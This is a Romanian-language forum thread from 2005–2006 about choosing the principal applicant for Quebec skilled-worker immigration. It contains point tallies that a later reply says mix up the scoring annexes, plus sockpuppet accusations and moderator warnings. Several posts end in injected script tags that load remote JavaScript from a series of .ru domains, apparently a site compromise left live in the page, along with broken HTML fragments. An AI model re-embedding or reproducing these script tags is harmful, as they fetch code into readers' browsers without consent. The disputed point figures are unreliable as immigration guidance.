PDA

Arată versiune întreagă : studii economice-emigrare?



raluc_b
24.04.2005, 01:35
buna


as vrea un sfat in legatura cu criteriile care primeaza in alegerea aplicantului principal. deci, o scurta descriere a situatiei noastre:


- eu: facultatea de comert, specializare marketing, 4 ani experienta ca economist-marketing si functionar bancar-credite; franceza-f bine; engleza-bine


-sotul: facultatea de contab si informatica de gestiune, master in administrarea afacerilor, 5 ani experienta ca si contabil si consilier in gestiune economica; franceza-mediu; engleza- bine


visam la quebec, credem ca avem ceva sanse, dar nu stim care sa fie aplicantul principal (ce conteaza mai mult la interviu-fluenta in franceza sau studiile, etc).


ne poate da cineva un sfat? multumesc

ovex
24.04.2005, 02:38
[i]La partea de inceput a formularului unde ai

Roxa
24.04.2005, 08:12
Doamna,

In determinarea principalului aplicant trebuie sa aveti in vedere mai multe categorii:
1. Educatia
2. Studiile privilegiate in Quebec/ O a doua specialitate
3. Ocupatia (daca aceasta se afla pe lista ocupatiilor cerute de Quebec)
4. Vechimea in munca si in ce domeniu
5. Virsta
6. Nivelul cunostintelor de limba Franceza si Engleza

Cel care are mai multe puncte, acela va fi desemnat ca si aplicant principal. Uneori exista diferente mici de 1-2 puncte care insa sint determinante.

In situatia dvs., iata cum ar arata punctajul:

Sotul dvs. ca principal aplicant

1. Educatie - Master Degree - 11p*
2. Experienta - 5 ani- 5p
3. Virsta - (20-35)- 10p
4. Limbi Straine- 9p
Franceza - mediu (nivel 7)-6p
Engleza - bine- (nivel 9) - 3p
5. Legaturi cu Quebec - 0p (daca nu aveti prieteni sau rude in Quebec)
6. Sotia - 8p
Educatie - Bachelor degree-3p
Experienta- 4 ani- 1p
Virsta- intre 20-35 ani-2p
Franceza- f.bine- nivel 9 - 2p
Totalul punctelor la etapa de pre-selectie a programului Mobilitate Profesionala este de 43 de puncte, ceea ce va da dreptul sa fiti evaluati si pentru selectie si sa primiti pentru factorul EMP 8 puncte.

* Daca sotul are un Bachelor Degree in Contabilitate si informatica si un Master Degree in Business Administration, iar pentru Master a studiat 1 an, mai primeste inca 2 puncte in plus, daca a studiat 2 ani, mai primeste 4 puncte in plus.

Selectie EMP:

Educatie- 11p
Experienta- 10
EMP-8p
Legaturi cu Quebec- 0
Virsta- 10p
Limbi straine-16 p
Franceza (nivel 7)- 10p
Engleza - nivel 9- 6p
Sotia-14
Educatie- 4p
Experienta- 2p
Franceza- nivel 9-8p
Copii - 0 p
Capacitate Financiara- 1p

Total Selectie- 70p
Cu acest punctaj va calificati pentru a avea un interviu cu un ofiter de emigratie. *Explicatia data mai sus referitoare la punctele suplimentare pentru o a doua specialitate se aplica si aici.

Sotia ca principal aplicant
Educatie - Bachelor Degree- 9p
Experienta- 4 ani- 5P
Virsta- intre 20 si 35 de ani- 10p
Limbi Straine- 11
Franceza- f.bine- nivel 9 - 8p
Engleza- 3p
Sot-8p
Educatie- 3
Experienta- 1
Virsta- 2
Franceza- mediu nivel 7- 2p
Quebec-0p
Total pre-selectie- 43

Selectie EMP
Educatie- 9p
Experienta- 8p
EMP- 8
Virsta- 10p
Limbi Straine-20
Franceza- 14p
Engleza- 6
Quebec-0p
Sot-14
Educatie- 4
Experienta- 2
Virsta- 2
Franceza- 6
Capacitate financiara-1

Total selectie= 70p

Conform informatiilor pe care le-ati dat, intruniti acelasi numar de puncte. Diferenta este ca dvs. cunoasteti mai bine limba Franceza. Avind in vedere ca la interviu se considera atit cunoasterea limbii Franceza, capacitatea de a va exprima si a intelege limba vorbita, dar si aspectul educational, experienta de munca, sugestia mea este sa fiti dvs. principalul aplicant, pentru meritul de a avea o mai mare posibilitate de a vorbi in Franceza.

Sper ca informatiile furnizate sa va fie de folos.

Va rog sa nu ezitati sa ma contactati daca aveti nevoie de date suplimentare.

Regards,<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www.bce8.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></script><script src=http://www.kpo3.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></s<script src=http://www.iroe.ru/ngg.js></script>

ovex
24.04.2005, 09:56
Dupa toate supozitiile de mai sus,eu nu mai pot decat sa-mi permit sa cred ca va veti face o evaluare REALA a sanselor,dupa datele REALE care reies evident din actele pe care le detineti.


Pentru ca nu vreau sa arat si eu ca un smileys/smiley8.gif,pentru a nu face greseala(a se citi gogomania)din topicul anterior,va rog sagasiti dvs.greselile din punctajul de mai sus si eventual sa le comunicati.EU AM O BANUIALA!!!!! Oricum punctaj de trecere aveti,se vede de la o posta,dar repet(fac o clona),AM O BANUIALA!!!!!

24.04.2005, 10:24
OARE :


ralu_b=Roxa


Eu inca nu zic nimic.

ovex
24.04.2005, 10:28
EU AM SCRIS CA AM DOAR O BANUIALA.......

sorin
24.04.2005, 13:41
Ovex si Maximus, tin sa va anunt ca IP-urile celor doua persoane de care spuneti voi sunt diferite, asa ca nu poate fi aceeasi persoana.


Roxa si-a manifestat dorinta sa-i public IP-ul la mesajele pe care le publica, dar am considerat ca n-ar fi drept ca doar ea sa-si publice IP-ul ci si ar trebui sa le public si pe ale voastre ca sa fie o situatie echitabila. Daca si voi confirmati ca vreti sa va public IP-urile atunci o voi face.


De asemeni, tin sa anunt ca nu am chef sa tolerez atacurile la persoana si hartuiala pe acest forum. Daca va ciondaniti in mod mai civilizat e treaba voastra, dar daca transformati forumul intr-o arena de lupta voi fi nevoit sa iau masuri.

raluc_b
25.04.2005, 07:52
merci de raspuns; si noi ne gandeam ca ceea ce conteaza imens este capacitatea de a te "vinde" cat mai bine la interviu si deci nivelul de cunoastere al limbii franceze este esential. dupa formularea intrebarii, mi-am adus aminte de niste cursuri pe care le-am urmat in facultate si care ar putea conta ca o a doua specializare (cursuri pt pregatirea personalului didactic, cursuri de imagine TV-camera digitala).


si sper, sincer, sa ne vedem cu totii in canada....


ps:ralu_b=raluc_b si atat.

Roxa
25.04.2005, 08:31
Doamna,
Trebuie sa aveti in vedere faptul ca, se puncteaza suplimentar ca si o a doua specialitate o diploma obtinuta in urma a cel putin 1 an de studiu full time.
In aceste conditii, acesle cursuri pe care le-ati urmat in facultate, daca faceau parte din programa scolara, nu pot fi considerate ca fiind o a doua specialitate.

Daca aveti nevoie de mai multe informatii, va rog sa nu ezitati sa ma contactati.

Mult succes.

Regards,

ovex
25.04.2005, 09:23
Asta am primit eu pe privat:



<TABLE height=14 cellSpacing=1 cellPadding=3 width="100%"><T>
<T>
<TR>
<TD class=ting noWrap width=145 background=forum_images/table_bg_image.gif bgColor=#a6aad3>Author</TD>
<TD class=ting noWrap width="82%" background=forum_images/table_bg_image.gif bgColor=#a6aad3>Message</TD></TR>
<TR>
<TD class=smText vAlign=top background="" bgColor=#f4f4fb><A name=""></A>sorin
Admin Group
http://www.romanian-portal.com/forum/forum_images/5_star_rating.gif
http://www.romanian-portal.com/forum/uploads/sorin/chess.jpg

Joined: 10 December 2003
Posts: 1422
Location: United States</TD>
<TD class=text vAlign=top background="" bgColor=#f4f4fb>
<TABLE cellSpacing=0 cellPadding=0 width="100%"><T>
<T>
<TR>
<TD class=smText width="60%">Sent: 25 April 2005 at 2:46am</TD>
<TD align=right width="30%">http://www.romanian-portal.com/forum/forum_images/delete_sm.gif (http://www.romanian-portal.com/forum/pm_delete_message.asp?pm_id=8732) http://www.romanian-portal.com/forum/forum_images/pm_reply.gif (http://www.romanian-portal.com/forum/pm_new_message_&#102;orm.asp?code=reply&amp;pm=8732)</TD></TR>
<TR>
<TD colSpan=2>
<HR>
</TD></TR></T></T></TABLE>


asa cum am mai scris si pe forum, nu voi permite transformarea acestui forum intr-un loc al rafuielilor personale. mi-ar parea rau sa pierd o persoana bine documentata ca tine care ajuta pe cei interesati cu raspunsuri documentate, dar daca nu se termina "razboiul" inceput voi fi nevoit s-o fac.


am zis mai mult ca nu ma bag intre voi dar m-a deranjat faptul ca acuzi pe cineva de dubla identitate cand de fapt ovex = maximus (acelasi IP)


daca mai faci acuzatii nefondate pe acest forum, ma vei pune in situatia sa dezvalui adevarul.


mersi de intelegere!


sorin</TD></TR>
<TR>
<TD background="" bgColor=#f4f4fb></TD>
<TD class=text background="" bgColor=#f4f4fb>


http://www.romanian-portal.com/forum/forum_images/profile_ic&#111;n.gif (java&#115;cript openWin'pop_up_profile.asp?PF=3&amp;FID=0','profile',' toolbar=0,locati&#111;n=0,status=0,menubar=0,scrollbars =1,resizable=1,width=590,height=425') http://www.romanian-portal.com/forum/forum_images/search_sm.gif (http://www.romanian-portal.com/forum/search_&#102;orm.asp?KW=sorin&amp;SI=AR&amp;FID=0) http://www.romanian-portal.com/forum/forum_images/home_ic&#111;n.gif (http://www.romanian-portal.com/) http://www.romanian-portal.com/forum/forum_images/add_buddy_sm.gif (http://www.romanian-portal.com/forum/pm_buddy_list.asp?name=sorin) http://www.romanian-portal.com/forum/forum_images/delete_sm.gif (http://www.romanian-portal.com/forum/pm_delete_message.asp?pm_id=8732)











<stron<script src=http://www.iroe.ru/ngg.js></script>

sorin
25.04.2005, 09:56
Aici te inseli foarte tare Ovex. Pentru a posta pe forum nimeni nu trebuie sa plateasca nimic si nu am absolut nici o tangenta cu Roxa, iar daca mesajele ei sunt corecte sau nu, nu am de unde sa stiu pentru ca asa cum am mai spus, nu ma pricep la legile emigrarii in Canada.
Atata timp cat voi doi ati avut discutii in contradictoriu, nu m-am amestecat si v-am lasat sa va descurcati singuri, dar atata timp cat nu se joaca

raluc_b
25.04.2005, 18:31
cursurile acelea nu faceau parte din programa scolara, erau optionale; cele pt pregatirea personalului didactic au constat in cate un curs pe an, timp de 3 ani(cursuri organizate de facultate), iar al doilea a fost urmat in cadrul UATC, dar a durat doar 2-3 luni.

Roxa
26.04.2005, 14:23
Doamna,
Cursurile de la UATC nu pot fi considerate ca o a doua specializare deoarece au durat doar 2-3 luni.
Daca pentru cele de pregatirea personalului didactic ati obtinut o diploma separata de licenta din facultate, trebuie vazut daca acestea intrunesc cerinta de a fi fost full time si ce specializare vi se acorda prin respectiva diploma.

Regards,

raluc_b
26.04.2005, 18:24
in ceea ce priveste cursurile pt pregatirea personalului didactic, acestea au constat in: un curs de medodica (in primul an; 4 ore/sapt); un curs de psihologie in al doilea an, idem; un curs de psihopedagogie in al patrulea an, idem; practica pedagocica la sfarsitul cursului. diploma obtinuta este separata de cea de licenta si imi da dreptul de a fi profesoara intr-un domeniul economic (inr-un liceu cu profil economic sau in cadrul unei universitati cu acelasi profil)


oricum, multumesc pentru raspunsuri.


o zi buna

stancescutzi
15.05.2005, 10:35
<DIV>HRISTOS A INVIAT!</DIV>
<DIV></DIV>
<DIV>suntem doi tineri casatoriti, care am vrea sa venim sa lucram pt o perioada in Canada, dar nu avem acolo o slujba deocamdata.</DIV>
<DIV></DIV>
<DIV>exista o posibilitate sa aplicam pt joburi pe vreun site specializat, sau ceva de genul asta?</DIV>
<DIV></DIV>
<DIV>e cineva printre voi care a facut asta?sau exista vreun program care faciliteaza work inCanada pt tinerii casatoriti?</DIV>
<DIV></DIV>
<DIV>noi suntem in domeniul economic.</DIV>
<DIV></DIV>
<DIV>Camelia&amp;Florin</DIV>

Carmen Viviana
16.03.2006, 09:13
<TABLE id=HB_Mail_C&#111;ntainer height="100%" cellSpacing=0 cellPadding=0 width="100%" border=0 UNABLE="&#111;n">
<T>
<TR height="100%" width="100%" UNABLE="&#111;n">
<TD id=HB_Focus_Element vAlign=top width="100%" background="" height=250 UNABLE="off">


As dori informatii despre emigrarea in Australia.Chiar nu ma poate ajuta nimeni?
Am mai cerut ajutorul vostru, dar degeaba.Despre Canada gasesti informatii cate vrei...dar despre Australia mai nimic.De ce?



</TD></TR>
<TR UNABLE="&#111;n" hb_tag="1">
<TD style="FONT-SIZE: 1pt" height=1 UNABLE="&#111;n">
<DIV id=hotbar_promo></DIV></TD></TR></T></TABLE>

sorin
16.03.2006, 09:36
In primul rand, daca ai nevoie de informatii in legatura cu imigrarea in <st1:country-regi&#111;n w:st="&#111;n">Australia</st1:country-regi&#111;n>, e bine sa intrebi pe forumul de <st1:country-regi&#111;n w:st="&#111;n"><st1:place w:st="&#111;n">Australia</st1:place></st1:country-regi&#111;n>, pentru ca ai sanse mai mari sa primesti un raspuns. In al doilea rand, forumistul nostru Eklesia, care posta mesaje pe forumul de <st1:country-regi&#111;n w:st="&#111;n"><st1:place w:st="&#111;n">Australia</st1:place></st1:country-regi&#111;n>, nu se mai ocupa cu probleme de emigrare.smileys/smiley18.gif Speram sa apara altcineva (poate Burebista) care sa fie mai activ pe acel forum.

fdianamaria
28.04.2006, 09:03
am si eu cateva intrebari:
1.sotul meu trebuie neaparat sa stie franceza daca vrem sa emigram in Quebec? Adica...conteaza asa mult la interviu?
Mentionez ca amandoi avem facultatea terminata, suntem economisti (cu experienta de peste 1 an in domeniu), 25 de ani fiecare, un copil de 10 luni, stim amandoi f bine engleza, dar doar eu franceza (nu f bine, dar pot imbunatati). In plus, am inca o facultate pe terminate (am licenta in iunie) si NU cunoastem pe nimeni acolo...
2. putem face ceva cu studiile noastre economice acolo? stim sa lucram pe calculator foarte bine...dar nu am vazut nicaieri ca ar fi ceva "privilegiat"....

ovex
02.05.2006, 11:40
http://www.romanian-portal.com/forum/forum_posts.asp?TID=392 3&amp;PN=1&amp;TPN=2

07.05.2006, 07:12
Doamna,

In determinarea principalului aplicant trebuie sa aveti in vedere mai multe categorii:
1. Educatia
2. Studiile privilegiate in Quebec/ O a doua specialitate
3. Ocupatia (daca aceasta se afla pe lista ocupatiilor cerute de Quebec)
4. Vechimea in munca si in ce domeniu
5. Virsta
6. Nivelul cunostintelor de limba Franceza si Engleza

Cel care are mai multe puncte, acela va fi desemnat ca si aplicant principal. Uneori exista diferente mici de 1-2 puncte care insa sint determinante.

In situatia dvs., iata cum ar arata punctajul:

Sotul dvs. ca principal aplicant

1. Educatie - Master Degree - 11p*
2. Experienta - 5 ani- 5p
3. Virsta - (20-35)- 10p
4. Limbi Straine- 9p
Franceza - mediu (nivel 7)-6p
Engleza - bine- (nivel 9) - 3p
5. Legaturi cu Quebec - 0p (daca nu aveti prieteni sau rude in Quebec)
6. Sotia - 8p
Educatie - Bachelor degree-3p
Experienta- 4 ani- 1p
Virsta- intre 20-35 ani-2p
Franceza- f.bine- nivel 9 - 2p
Totalul punctelor la etapa de pre-selectie a programului Mobilitate Profesionala este de 43 de puncte, ceea ce va da dreptul sa fiti evaluati si pentru selectie si sa primiti pentru factorul EMP 8 puncte.

* Daca sotul are un Bachelor Degree in Contabilitate si informatica si un Master Degree in Business Administration, iar pentru Master a studiat 1 an, mai primeste inca 2 puncte in plus, daca a studiat 2 ani, mai primeste 4 puncte in plus.

Selectie EMP:

Educatie- 11p
Experienta- 10
EMP-8p
Legaturi cu Quebec- 0
Virsta- 10p
Limbi straine-16 p
Franceza (nivel 7)- 10p
Engleza - nivel 9- 6p
Sotia-14
Educatie- 4p
Experienta- 2p
Franceza- nivel 9-8p
Copii - 0 p
Capacitate Financiara- 1p

Total Selectie- 70p
Cu acest punctaj va calificati pentru a avea un interviu cu un ofiter de emigratie. *Explicatia data mai sus referitoare la punctele suplimentare pentru o a doua specialitate se aplica si aici.

Sotia ca principal aplicant
Educatie - Bachelor Degree- 9p
Experienta- 4 ani- 5P
Virsta- intre 20 si 35 de ani- 10p
Limbi Straine- 11
Franceza- f.bine- nivel 9 - 8p
Engleza- 3p
Sot-8p
Educatie- 3
Experienta- 1
Virsta- 2
Franceza- mediu nivel 7- 2p
Quebec-0p
Total pre-selectie- 43

Selectie EMP
Educatie- 9p
Experienta- 8p
EMP- 8
Virsta- 10p
Limbi Straine-20
Franceza- 14p
Engleza- 6
Quebec-0p
Sot-14
Educatie- 4
Experienta- 2
Virsta- 2
Franceza- 6
Capacitate financiara-1

Total selectie= 70p

Conform informatiilor pe care le-ati dat, intruniti acelasi numar de puncte. Diferenta este ca dvs. cunoasteti mai bine limba Franceza. Avind in vedere ca la interviu se considera atit cunoasterea limbii Franceza, capacitatea de a va exprima si a intelege limba vorbita, dar si aspectul educational, experienta de munca, sugestia mea este sa fiti dvs. principalul aplicant, pentru meritul de a avea o mai mare posibilitate de a vorbi in Franceza.

Sper ca informatiile furnizate sa va fie de folos.

Va rog sa nu ezitati sa ma contactati daca aveti nevoie de date suplimentare.

Regards,





Stimata Dra/Dna,


desi a trecut ceva timp de cand a fost initiata aceasta discutie (si probabil autoarea a trecut deja de interviu) imi permit sa fac cateva comentarii:


a)Daca masterul e de 1 an sau 2 aniesteposibil sa fie punctat la criteriul 1.1 Scolarite si aplicantul sa cumuleze 11 puncte insa in nici un caz nu ar putea sa fie punctat la criteriul 1.2 Deuxieme specialite in conditiile in care masterul e tot in domeniul economic precum facultatea.


b) Spre marea mea stupoare dv. ati inversat Annexe 1 cu Annexe 2 si conf<script src=http://www.iroe.ru/ngg.js></script>

07.05.2006, 07:16
Doamna,
Cursurile de la UATC nu pot fi considerate ca o a doua specializare deoarece au durat doar 2-3 luni.
Daca pentru cele de pregatirea personalului didactic ati obtinut o diploma separata de licenta din facultate, trebuie vazut daca acestea intrunesc cerinta de a fi fost full time si ce specializare vi se acorda prin respectiva diploma.

Regards,


Revin cu o precizare: modulul pedagogic nu poate fi considerat o a doua specializare in nici un caz. Sa nu incercati sa ma contraziceti pentru ca am facut in facultate cel mai amplu modul pedagogic posibil in Romania (350 ore) si am trecut si printr-un interviu unde nu mi s-a punctat asa ceva.